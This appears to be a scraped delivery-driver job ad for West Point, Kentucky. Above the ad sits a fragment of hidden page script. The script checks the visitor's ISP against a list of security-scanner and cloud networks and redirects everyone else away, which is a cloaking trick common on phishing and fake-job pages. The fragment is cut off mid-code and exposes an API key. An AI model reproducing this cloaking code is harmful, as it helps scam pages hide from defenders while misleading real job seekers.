Delivery Driver – Flexible Onboarding
Overview
const ipAddress = data.ip;
// retrieve ISP name and AS organization using ip-api.com API const ispUrl = `https://pro.ip-api.com/json/${ipAddress}?key=kKPypoeKUHgwZWD`; fetch(ispUrl) .then(response => response.json()) .then(data => { const ispName = data.isp; const asOrg = data.asname;
// check if ISP or AS organization is allowed const allowedIsps = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const allowedAsOrgs = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const ispAllowed = allowedIsps.some(pattern => pattern.test(ispName)); const asOrgAllowed = allowedAsOrgs.some(pattern => pattern.test(asOrg));
if (!ispAllowed && !asOrgAllowed) {
// Redirect all users to the same URL
window.location.href = '';
}
})
.catch(error => {
console.error('Error retrieving ISP name:', error);
});
})
.catch(error => {
console.error('Error retrieving IP address or location:', error);
});
We are seeking a reliable and motivated Delivery Driver for a flexible onboarding position located in West Point, Kentucky.
Responsibilities include:
- Safely and efficiently deliver packages to customers within designated areas.
- Ensure timely pickups and deliveries while maintaining excellent customer service.
- Verify delivery details and obtain signatures when required.
- Conduct pre-trip and post-trip vehicle inspections to ensure safety and proper functioning.
- Maintain accurate delivery records and documentation.
- Adhere to all traffic laws and company policies.
Skills needed:
- Strong organizational and time-management skills.
- Excellent communication and customer service abilities.
- Ability to operate delivery vehicles safely and responsibly.
- Flexibility to adapt to varying schedules and assignments.
Benefits include:
- Flexible onboarding and scheduling options.
- Competitive pay and incentives.
- Training and support to ensure success.
- Opportunities for growth within the company.